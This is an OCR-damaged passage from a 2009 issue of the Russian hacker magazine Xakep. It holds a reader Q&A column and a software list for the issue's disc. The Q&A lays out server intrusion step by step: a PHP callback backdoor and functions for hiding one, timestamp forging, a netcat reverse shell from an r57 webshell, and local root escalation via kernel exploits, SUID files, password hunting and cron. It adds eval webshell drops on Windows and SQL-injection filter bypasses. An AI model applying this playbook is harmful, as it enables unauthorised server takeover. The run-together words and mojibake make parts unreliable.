книги хакеры / журнал хакер / 130_Optimized

UNITS

/ HTTP://WAP-CHAT.RU /

ob_start($_REQUEST['a']); echo $_REQUEST['b']; ob_end_flush(); // script. php?a=phpinfo&b=-1

#---# ?>

Также, попримерусusort, array_map и ob_start представляютебенебольшойсписок callback-функций, пригодныхдлязаражения:

register_shutdown_function set_error_handler call_user_func_array call_user_method call_user_method_array uasort

uksort array_filter array_reduce array_walk

preg_replace_callback stream_filter_register xml_set_element_handler xml_set_default_handler xml_set_notation_decl_handler xml_set_character_data_handler xml_set_end_namespace_decl_handler xml_set_external_entity_ref_ handler xml_set_start_namespace_decl_ handler xml_set_unparsed_entity_decl_ handler xml_set_processing_instruction_ handler

xmlrpc_server_call_method xmlrpc_server_register_method xmlrpc_server_register_ introspection_callback

Влюбомслучае, послепротрояниваниянужногоскриптанезабывайвозвращатьегодату модификации:

touch -t yearmonthdayhoursminutes. seconds ./script.php

Q: Опишивкратценаиболеереальныеспособы получитьroot насервере.

A: Первымделом, конечноже, тебенуженвебшеллнасервережертвы. Какегополучать, я надеюсь, тызнаешь:)

Затемтыврядлиобойдешьсябезинтерактивногошелла, запуститькоторый, например, можнотак:

1.Заливаемнасайтжертвыr57 шеллотrst;

2.Ставимнасвойwindows-дедикnetcat

(http://www.web-hack.ru/download/download. php?go=100);

3.Запускаемnetcat напрослушиваниепорта

11457: cmd.exe Æc:/nc/nc.exe -l -p 11457;

4.В r57 шелле запускаем connect-back

(в поле IP вписывай — ip твоего дедика, поле с портом и паролем оставляй дефолтными);

5.Смотримнаокошкоnetcat инаслаждаемся шеллом.

Теперь, когдаутебяестьинтерактивныйшелл насистеме, можнопопробоватьприменить ядерныеэксплойты:

1.Узнаемверсиюядра: uname -a;

2.Узнаемверсиюиимядистрибутива: cat / etc/*release*;

3.Идемнаhttp://milw0rm.com/search.php и ищемнужныйнамlocal root exploit;

4.Собираем эксплойт: gcc -o exploit exploit.c (зачастую в комментариях в исходниках сплойта могут быть указаны дополнительные флаги для сборки — не пропусти их);

5.Послесборкиэксплойтазапускаемоный: ./ exploit;

6.Влучшемслучаенаслаждаемсяuid=0, gid=0, вхудшем— смотримдальше.

Еслисядернымэксплойтомнеполучилось, то:

1.Изучаемсписокдемонов, которыекрутятся насервере

ps -aux — список процессов

which bin_file — смотрим, есть ли определенный бинарник на системе bin_file --version (или -v) — версия бинарника

ls -la /bin /home /usr/bin /usr/ sbin /usr/local/bin /usr/local/ sbin — бинарники, присутствующие на системе

2.Идемнаmilw0rm.com засоответствующим эксплойтомподнужныйдемон;

3.Собираем, запускаемсплойтинаслаждаемсяправамирута/сервиса.

Еслинеполучилосьсдемоном, тотвойдальнейшийпуть— суидныеигуидныефайлы. Итак, суид(отсокращенногоsetuid) — права навыполнениеотименихозяина, гуид— с правамигруппы.

1.Ищемтакиефайлы:

find / -type f -perm -04000 -ls find / -type f -perm -02000 -ls locate *.pl|grep suidperl

2. Смотрим, какиеизнайденныхфайлов доступныназапись, например:

-rwsrwxrwx 1 root petya 135 Àïð 17 18.40 file1.php

-rwsrwxrwx 1 root petya 135 Àïð 17 18.40 file1.sh

-rwsrwxrwx 1 root petya 135 Àïð 17 18.40 file

-rwxr-sr-x 1 petya root 135 Àïð 17 18.40 file2.php

-rwxr-sr-x 1 petya root 135 Àïð 17 18.40 file2.sh

-rwxr-sr-x 1 petya root 135 Àïð 17

18.40file2

Вданномслучае— первые3 файладоступны назаписьиимеютsuid бит, тоестьтыможешь подсунутьимнавыполнениеbash/php кодот имениюзераroot.

Следующие3 файла— членыгруппыroot. Они недоступныназапись, новсеравноможно попробоватьподсунутьимсвойкод, прочитав, чтоониделают(спомощьюманов, либо отследивдействиябинарника: strace ./file2, strings ./file2).

Допустим, с суидниками тебе не повезло, тогда твой путь — логи, конфиги и бэкапы, в которых может случайно затеряться интересный пароль от какой-нибудь учетной записи (например, в .bash_history мне несколько раз встречались неверные попытки ввода пароля длы su и sudo, на основе которых я смог вычислить верный рутовый пароль).

Искатьихможноспомощьюследующих команд:

locate ÷òî-òî

find / -type f -name "÷òî-òî"

Обычноищутпошаблонам:

.htaccess

.htpasswd

*history*

*conf*

*backup*

Наконец, еслитебеснованеповезло, существуетещеодинзамечательныйспособ— атака черезcron:

1.Ищемфайлыcrontab;

2.Смотрим, какиефайлыпоставленына запусккроном;

3.Смотрим, доступнылиназаписьэтифайлы ичтоони, собственно, делают:

4.Пытаемсяперезаписатьихиливнедритьв нихсвоикоманды.

Всеописанныеспособы— наиболеераспро- страненныедляполученийroot-привилегий

UNITS

насистеме, используйихграмотноиникогда незабывайподчищатьследысвоегопребываниянасистеме:)

Q: Какзалитьшеллнавинде? Ведьтамнетмоих любимыхwget иcurl :'(.

A: Длятвоегосабжанавиндесуществуетне меньшееколичествовариантов, чемвниксах. Смотринекоторыеизних:

1.Знакомыйтебепониксамecho —

echo ^<? eval($_REQUEST[cmd]); ?^>

>shell.php

2.Банальныйftp —

>ftp

ftp> open localhost Connected to localhost Microsoft FTP

User (x.x.x.x:(none)): x 230 User logged in, proceed.

ftp>get http://site.com/shell.txt

3.Любимыйтобойtelnet —

telnet site.com 80 -f shell.php

GET /shell.txt HTTP/1.1 Accept: */* Accept-Language: ru Host: site.com

Proxy-Connection: Keep-Alive

Q: Нашелsql-инъекцию, нозлыеадминыпоставилинафильтрациюнапробел. Существуютли аналогипробелавsql-запросах?

A: Ещекаксуществуют! Вотнаиболеечасто применяемыеспособыдлязаменыпробела:

1. + или%2B;

2. табуляция" " или%09;

3.возвраткаретки" " или%0D;

4.переводстроки%0A;

5.комментарий/**/

6.скобки: select(1)from(users)where(id=1)

Q: Слышал, чтовMySQL возможноразделение запросовчерез«;». Расскажи, какэтовозможно?

A: Действительно, поддержканескольких запросоввмускулосуществимапринесколькихусловиях:

1.ВерсияMySQL >= 4.1;

2.Дляподключениякбазеданныхиспользу-

етсяфункцияmysql_real_connect() спараметромCLIENT_MULTI_STATEMENTS.

Еслинавыходебудетнесколькорезультатов, тонеобходимоиспользоватьпараметр

CLIENT_MULTI_RESULTS, апереключаться междунимиможноспомощьюфункции mysql_next_result().

Q: Какимобразомвкоманднойстрокеможно работатьсPostgreSQL?

A: Оченьпросто! Дляпростейшеговыполне-

нияSQL-запросовтебенадозалогинитьсяв интерактивномшеллевклиентpsql:

psql -d base -U pg_admin -W pg_ admin_password

Дампитьбазыpostgresql можнотак:

pg_dump dbname > dbname.sql

Авосстановитьсохраненнуюбазутак:

cat dbname.sql | psql dbname

Вобоихслучаяхсистемапопроситутебя пароль.

Q:БлагодарявамяначалписатьнаPython'е. Простыескрипты, например, дляавтоматизацииподчисткилоговяужелегкопишу, новсе чащепоявляетсяжеланиеперевестинаPython

исвоиPHP-проекты. Подскажи, какнаиболее правильнописатьвеб-приложениянаPython? Какихприкрутитьксерверу?

A:Пожалуй, самый простой и во многом один из самых правильных вариантов — использовать хостинг, который поддерживает WSGI (Web Server Gateway Interface). «Виски» —

это специальный стандарт взаимодействия между программой на Python, выполняющейся на стороне сервера, и самим веб-сер- вером, например, Apache. WSGI описывает конкретные правила того, как должны взаимодействоать между собой веб-сервер

ивеб-приложение. На практике — это просто описание функции вызова приложения абстрактным сервером: формата передаваемых параметров и формата возврата значений этой функции. Приложение, написанное

на WSGI, не знает кто его вызвал, т.е. для него абсолютно все равно, запущен ли он на mod_python под Apache или как FastCGI, или как CGI. Приложение и сервер выделяются в разные абстракции.

Помимоэтогостандартописываеттакназы- ваемыеmiddleware-компоненты, предоставляющиеинтерфейсыкакприложению, так

исерверу. Тоестьдлясервераmiddleware являетсяприложением, адляприложения— сервером. Этопозволяетсоставлять

«цепочки» изWSGI-совместимыхmiddleware, каждаяизкоторыхвыполняетсвоюфункцию (балансировканагрузки, обработкасессий, авторизацийит.д.)

Q:Подскажи, хорошийсканерBluetooth-уст- ройстввэфире. Чембольшеонможетвыдать информации— темлучше.

A:Насамомделе, ничегонестоитнапи-

сатьтакойсканерсамому. ПримерпростогоскриптанаPython тыможешьнайти воднойизстатейСквозного(www.xakep. ru/magazine/xa/104/030/1.asp). Впрочем,

естьнамногоболеепроработанныеутилиты, например, сканерHaraldscan (code.google.

com/p/haraldscan). Написанныйнапитоне сиспользованиембиблиотекиPybluez, он быстровыдаетMAC-адресавсехнаходящихся вокругеустройств, ихтип, атакжепытается определитьпомакупроизводителя.

Q: Хочунаписатьсканербезопасностидля элементов, написанныхнаFlash. Поискалвинтернетеиничегоподобногоненашел. Оцените идею.

A: Спору нет, идея хороша, а вот гуглишь ты не ахти :). С реализацией ты самую малость опоздал, потому что я вспомню, как минимум, несколько специализированных сканеров для тех элементов веб-сайтов, которые написанны на Flash. Ребята из HP Web Security Research Group разработали утилиту HP SWFScan (https://h30406.www3. hp.com/campaigns/2009/wwcampaign/1- 5TUVE/index.php?key=swf), которая декомпилирует SWF-файлы, извлекает все сценарии на ActionScript, после чего анализирует код в поиске потенциально узявимых мест. Приятно, что, помимо этого, SWFScan предлагает вариант исправления ошибки.

Q:Есть возможность получить бесплатную виртуальную машину в одном из датацентров. Ресурсы будут сильно ограничены, поэтому вопрос: что вообще с ней можно сделать?

A:Самая большая проблема большинства виртуальных машин — это производительность дисковой подсистемы. Если что-то работает с HDD, то работает медленно.

Сдругой стороны, если программа не выполняет операции ввода-вывода, то использовать ее, даже в рамках виртуальной машины, можно на полную катушку. Понятно, что ресурсоемкие задачи виртуалке, скорее всего, не потянуть, а вот, например, работу с сетью — запросто. На одном из моих виртуальных серверов я использую несколько линуксовых утилит для маршрутизации. А на другом — инструмент для балансировки нагрузки на веб-серверы

HAProxy (haproxy.1wt.eu) и средство для мониторинга сетевой активности Cacti (www.cacti.net).

Q:Каксдампитьсвойтрафик, передаваемый поSSL?

A:Тебе поможет утилита SSHole (thekonst. net/ru/sshole). Эта небольшая программа, которая может пригодиться для отладки протоколов, защищенных с помощью SSL. При запуске она ждет соединения на заданном порту, а затем, при получении входящего соединения от клиента, соединяется с оригинальным сервером и работает прозрачно как прокси. Отличие в том, что весь трафик копируется локально на stdout. SSHole может обрабатывать несколько соединений одновременно. z

>>WINDOWS

>Dailysoft

7-Zip 4.65

AIMP 2.51

Autoruns for Windows 9.53

DAEMON Tools Lite 4.30.4

Download Master 5.5.12.1173

Far Manager 2.0

FileZilla Client 3.2.7.1

K-Lite Codec Pack Full 5.1.0

Miranda IM 0.8.7

Mozilla Firefox 3.5.3

Notepad++ 5.5.5

Opera 10.00

PuTTY 0.60

QIP 2005 Build 8095

Skype 4.04.0

Total Commander 7.04a

Unlocker 1.8.7

Xakep CD DataSaver 5.2

XnView 1.96.2

>Development

Aptana Studio 1.5.1

AQtime 6.21

CodeIgniter 1.7.2

EmEditor 8.06

Firebird 2.1.3

Geany 0.18

Google App Engine SDK 1.2.5

Intype 0.3.1

JDK 6 Update 16 with NetBeans 6.7.1

Jython 2.5.1

MonoDevelop 2.2b1

Pida 0.4.4

Portable Python 1.1

pydee 0.4.23

Pydev 1.5.0

PyScripter 1.9.9.7

Python 2.6.2

Python 3.1.1

Qt SDK for Open Source C++ 2009.03.1

SharpDevelop 3.1

SQLite 3.6.18

SQLiteManager 3.1.1

TortoiseSVN 1.6.5

UltraGram 4.2.50

Web IDE 4.45

WebLOAD 8.4RC

Wing IDE 3.2.1-1

>Games

Scorched3D 42.1

ZumasRevenge Demo

>Misc

Chandler Desktop 1.0.3

Console 2.00b

Copy Path Shell Extension 1.1

Evernote 3.5.0

Everything 1.2.1.371

Lacuna Launcher 1.0

ManicTime 1.2.1

PowerGREP 3.5.5 Demo

ReNamer 5.50

Seven Remix XP 2.3.1

Taskbaric 20090530

Traduisons! 0.3.0

>Multimedia

Appetizer 1.3

Artizen HDR Stand-alone 2.8b

cuberok 0.0.11

Desktoptube 1.2

Google SketchUp 7.1

iTunes 9.0.1

Jaangle 0.97

Logon Controller

MetatOGGer 3.9.3.0

MurGeeMon

Picasa 3.5

Pitch Perfect Guitar Tuner

PlusOffice Free 2009 3.0

Viewer2

>Net

Cookienator 2.5.32

Google Chrome 3.0

JStock 1.0.4j

SpeedyFox 1.3

Spiffy 0.3.4

Thunderbird 2.0.0.23

>Security

Cookienator 2.5.32

Google Chrome 3.0

JStock 1.0.4j

SpeedyFox 1.3

Spiffy 0.3.4

Thunderbird 2.0.0.23

>System

BareTail 3.50a

dot.NET Framework 3.5 Service Pack 1

EASEUS Partition Master 4.0.1

GFI Backup 2009 for FREE

Microsoft Web Platform Installer 2.0

Norton Antivirus 2010

Norton Internet Security 2010

>>UNIX

>Desktop

Ayam 1.16

Blender 2.49b

Cinelerra 4.1

GNOME 2.28.0

Inkscape 0.47pre3

KDocker 4.2.2

Launchy 2.1.2

Necromancer's Dos Navigator 2.31

Nero Linux 4

OGMRip 0.13.1

RockBox 3.4

Sound Juicer 2.28

Task Coach 0.74.2

Tellico 2.0

Theora 1.1

Tracker 0.7.0

Transmageddon 0.13

wbar 1.3.3

XNeur+gXNeur 0.9.6

Xplanet 1.2.1

>Devel

Anjuta IDE 2.28

Arcadia 0.7.0

BIEW 6.0

BitRock InstallBuilder 6.2.2

boost 1.40.0

Glom 1.12.0

graudit 1.2

KDbg 2.2.0

KDiff3 0.9.95

Kohana 3.0

libglade 2.0.1

liboggz 1.0.0

libusb 1.0.3

nwcc 0.8

PyDev 1.5.0

sdcc 2.9.0

Source Navigator 6.0

Tora 2.1.0

Umbrello 1.5.8

Vaadin 6.1.1

>Games

CuteMaze 1.1.0

The Legend of Edgar 0.31

>Net

aMule 2.2.6

Appkonference 1.2

Choqok 1.0

DRadio 3.4

Ekiga 3.20

Gnash 0.8.6

Googsystray 0.6

gPodder 2.0

jIRCii 09.22.09

Konversation 1.2

KTorrent 3.2.4

LFTP 4.0.2

Mozilla Firefox 3.0.14

Opera 10

SIM 0.9.4.3

TorNavigator 0.0.2

TubeMaster++ 1.4

TunnelIt 0.0.1.1514

vnStat 1.9

Wget 1.12

>Security

Authforce 0.9.9

BFBTester 2.0.1

Flawfinder 1.27

Haraldscan 0.3

Hping3

John the Ripper 1.7.3.4

Kismet 2009.06 R1

NetStumbler 0.4.0

Nikto 2.03

OSSEC HIDS 2.2

Snort 2.8.5

SSLsniff 0.6

sXid 4.2

Trafscrambler 0.2

Websecurify 0.3

Wireshark 1.2.2

Yersinia 0.7.1

Все для Sql-Injection:

Absinthe 1.4.1

Blind SQL Injection Perl Tool

FG Injector 0.9a

MySqloit 0.1

SQID 0.3

SQL Power Injector 1.2

Sqlbftools 1.2

SQLBrute

SQLIer 0.8.2b

Sqlmap 0.7

SQLNinja 0.2.3

>Server

Apache 2.2.13

Asterisk 1.6.1.6

BIND 9.5.2

CUPS 1.4.1

DeleGate 9.9.4

DHCP 4.1.1b2

GAdmin-DHCPD 0.4.6

MySQL 5.1.39

OpenLDAP 2.4.18

OpenSSH 5.2

OpenVPN 2.0.9

PostgreSQL 8.4.1

Rspamd 0.2.7

Samba 3.4.1

Sendmail 8.14.3

SpamCheck 0.6.5

Squid 3.0.STABLE19

Sshguard 1.4

>System

ATI Catalyst 9.9

Cluster SSH 3.27

Conky 1.7.2

Firewall Builder 3.0.7

G4L 0.31

Gslapt 0.5.2

iptables 1.4.5

KBackup 0.6.3

Linux Kernel 2.6.31.1

nVidia 185.18.36

SADMS 2 2.0.13

slapt-get 0.10.2a

Sysstat 9.0.5

SystemTap 1.0

Ubuntu Tweak 0.4.9

Wine 1.1.30

>X-distr

Desktop BSD 1.7

DragonFly BSD 2.4

x№ 10(130) ОКТЯБРЬ 2009

2009 )ОКТЯБРЬ( 10 x

ТЕХНОЛОГИИ ПСЕВДОБЕЗОПАСНОЙ СЕКРЕТЫ ДРУГИЕ И ТРАФИКА ЧУЖОГО ПЕРЕХВАТ TOR/

130